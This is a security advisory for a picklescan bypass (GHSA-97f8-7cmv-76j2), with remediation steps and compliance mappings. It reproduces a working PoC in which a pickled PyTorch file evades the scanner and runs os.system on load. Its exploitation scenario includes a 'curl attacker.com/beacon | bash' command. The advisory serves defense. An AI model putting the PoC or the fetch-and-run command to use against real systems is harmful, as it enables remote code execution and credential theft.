GHSA-97f8-7cmv-76j2: picklescan: Allowlist Bypass evades input filtering

GHSA-97f8-7cmv-76j2 HIGH
Published February 18, 2026
CISO Take

If your ML pipeline relies on picklescan to gate PyTorch model ingestion, that control has a known bypass — upgrade to picklescan 1.0.3 immediately. A public PoC exists, the technique is straightforward, and the payload delivers full code execution on model load. Re-scan any external .pt files vetted with older versions and enforce weights_only=True in all torch.load() calls as an independent defense-in-depth measure.

Risk Assessment

HIGH. The attack undermines a dedicated security control explicitly deployed to detect malicious ML models, meaning the scanner output actively provides false assurance. The PoC is public, requires no ML expertise (only knowledge of Python pickle internals), and delivers arbitrary OS command execution. Risk is amplified in organizations that treat a clean picklescan result as sufficient to trust a model file. Any pipeline ingesting external PyTorch .pt files with picklescan < 1.0.3 should be treated as compromised until remediated.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 1.0.3 1.0.3

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

Recommended Action

6 steps
  1. PATCH

    Upgrade picklescan to >= 1.0.3 immediately — this is the primary fix.

  2. RESCAN

    Re-scan all external .pt files ingested while running picklescan < 1.0.3, treating prior clean results as unverified.

  3. ENFORCE weights_only=True

    Set weights_only=True in all torch.load() calls — this blocks pickle-based code execution as an independent control regardless of scanner results.

  4. SANDBOX

    Load models in isolated containers (no network egress, restricted filesystem) even after passing scanner validation.

  5. PREFER SafeTensors

    Migrate model distribution to the SafeTensors format, which eliminates this class of vulnerability entirely by avoiding pickle serialization.

  6. AUDIT PIPELINES

    Identify every pipeline that calls picklescan and every call site using torch.load() with weights_only=False — these are your blast radius.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.1.6 - AI supply chain risk management
A.6.2.3 - AI system security
A.8.4 - AI system security and resilience
A.9.1 - AI supply chain management
NIST AI RMF
GOVERN-6.2 - AI risk or related factors are considered in acquisition decisions
MANAGE-2.4 - Countermeasures are identified and documented
MEASURE-2.7 - AI system security testing and evaluation
OWASP LLM Top 10
LLM03 - Supply Chain (2025 list)
LLM05 - Supply Chain Vulnerabilities (2023 list)

Frequently Asked Questions

What is GHSA-97f8-7cmv-76j2?

GHSA-97f8-7cmv-76j2 is an allowlist bypass in picklescan that evades its input filtering: a crafted PyTorch .pt file can pass the scanner cleanly yet execute arbitrary code when loaded. A public PoC exists and the technique is straightforward. Upgrade to picklescan 1.0.3, re-scan any external .pt files vetted with older versions, and enforce weights_only=True in all torch.load() calls as an independent defense-in-depth measure.

Is GHSA-97f8-7cmv-76j2 actively exploited?

No confirmed active exploitation of GHSA-97f8-7cmv-76j2 has been reported, but organizations should still patch proactively.

How to fix GHSA-97f8-7cmv-76j2?

1. PATCH: Upgrade picklescan to >= 1.0.3 immediately — this is the primary fix.
2. RESCAN: Re-scan all external .pt files ingested while running picklescan < 1.0.3, treating prior clean results as unverified.
3. ENFORCE weights_only=True: Set it in all torch.load() calls — this blocks pickle-based code execution as an independent control regardless of scanner results.
4. SANDBOX: Load models in isolated containers (no network egress, restricted filesystem) even after passing scanner validation.
5. PREFER SafeTensors: Migrate model distribution to the SafeTensors format, which eliminates this class of vulnerability entirely by avoiding pickle serialization.
6. AUDIT PIPELINES: Identify every pipeline that calls picklescan and every call site using torch.load() with weights_only=False — these are your blast radius.

What systems are affected by GHSA-97f8-7cmv-76j2?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, model registries, ML CI/CD pipelines, data science workstations.

What is the CVSS score for GHSA-97f8-7cmv-76j2?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary

This is a scanning bypass of the `scan_pytorch` function in `picklescan`. The implementation of [get_magic_number()](https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/torch.py#L76C5-L84) uses `pickletools.genops(data)` to recover the magic number, accepting it only when the opcode name contains `INT` or `LONG`. PyTorch's implementation, by contrast, simply calls [pickle_module.load()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1797) to obtain it. Because of this implementation difference, an attacker can embed the magic number in the PyTorch file through a dynamic `eval` via the `__reduce__` trick: `pickletools.genops(data)` then finds no `INT` or `LONG` opcode carrying the magic number, while `pickle_module.load()` still returns the correct value, leading to a bypass.

### PoC

#### Attack Step 1

Edit the source code of the function [\_legacy\_save()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1120) as follows:

```python
class payload:
    def __reduce__(self):
        return (eval, ('MAGIC_NUMBER',))

pickle_module.dump(payload(), f, protocol=pickle_protocol)
```

#### Attack Step 2

With the modified version of PyTorch, run the following PoC to generate `payload.pt`:

```python
import torch

class payload:
    def __reduce__(self):
        return (__import__('os').system, ('touch /tmp/hacked',))

torch.save(payload(), './payload.pt', _use_new_zipfile_serialization=False)
```

#### Picklescan result

```
ERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356
----------- SCAN SUMMARY -----------
Scanned files: 0
Infected files: 0
Dangerous globals: 0
```

#### Victim Step

```python
import torch

torch.load('./payload.pt', weights_only=False)
```

The file `/tmp/hacked` is then created on the local system.

### Impact

Craft malicious PyTorch payloads that bypass `picklescan`, then achieve arbitrary code execution (ACE/RCE) on model load.
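The opcode-level gap described above can be reproduced with the standard library alone, without PyTorch: a value rebuilt through a `__reduce__` callable never surfaces as an `INT`/`LONG` opcode in `pickletools.genops` output, yet unpickling still yields the same number. A minimal sketch (using the benign `int` as the reconstructing callable instead of `eval`; the class name is illustrative):

```python
import pickle
import pickletools

MAGIC = 119547037146038801333356  # PyTorch legacy-format magic number

class MagicViaReduce:
    """Illustrative only: emit the magic number through a callable
    (here the harmless `int`) instead of a literal constant."""
    def __reduce__(self):
        return (int, (str(MAGIC),))

direct = pickle.dumps(MAGIC, protocol=2)              # literal constant
indirect = pickle.dumps(MagicViaReduce(), protocol=2)  # rebuilt via REDUCE

def int_long_opcodes(data):
    """Opcode names a static INT/LONG scan would match."""
    return [op.name for op, _, _ in pickletools.genops(data)
            if "INT" in op.name or "LONG" in op.name]

# A static opcode scan (picklescan's approach) sees the literal
# but finds nothing to match in the REDUCE-based pickle:
assert int_long_opcodes(direct)
assert int_long_opcodes(indirect) == []
# Actually unpickling (PyTorch's approach) returns the value either way:
assert pickle.loads(indirect) == MAGIC
```

This is why the scanner reports an invalid magic number and scans zero files, while `torch.load()` proceeds and executes the payload.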

Exploitation Scenario

An adversary uploads a malicious .pt file to a shared model repository (internal MinIO, HuggingFace private space, or emailed to an ML team). The file is serialized with _use_new_zipfile_serialization=False and contains a class whose __reduce__ returns (eval, ('MAGIC_NUMBER',)) to satisfy the magic number check, plus a second payload class that executes os.system('curl attacker.com/beacon | bash'). The automated ingestion pipeline runs picklescan — result: 0 infected files. The model is promoted to staging. An ML engineer or inference service calls torch.load('./model.pt', weights_only=False). The payload executes with the service account's privileges, establishing a reverse shell or exfiltrating cloud credentials from the training environment.

Timeline

Published
February 18, 2026
Last Modified
February 18, 2026
First Seen
March 24, 2026

Related Vulnerabilities